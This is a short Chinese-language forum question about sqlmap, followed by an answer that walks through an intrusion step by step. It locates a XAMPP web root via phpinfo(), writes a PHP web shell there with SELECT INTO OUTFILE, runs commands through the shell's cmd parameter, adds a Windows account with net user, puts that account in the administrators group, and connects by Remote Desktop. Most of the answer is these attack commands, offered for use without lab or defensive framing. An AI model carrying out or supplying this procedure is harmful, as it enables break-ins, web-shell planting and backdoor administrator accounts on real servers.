求大佬知道 关于sqlmap

在b站看到视频 是拿到sql的shell 通过保存文件的命令 保存php小马到url上 之后执行小马cmd传大马或者其他

还没拿到shell就要提权？

通过xampp页面的phpinfo（）找到网站根目录的路径，将php小马通过数据库语言保存到这个路径下通过url能访问到
命令：
select * into outfile 'D:/xampp/htdocs/xampp/aa.php' from aa;
之后打开小马在小马参数后面打上cmd=dir能看到页面返回内容
之后添加管理员账户:
cmd=net user xxx 123456 /add看到命令成功完成
添加账户到管理员用户组
net localgroup administrators xxx /add
之后直接通过mstsc.ext远程桌面连接即可。

B站搜索【网络安全】Kali Linux web渗透测试 经典视频 ，玄魂的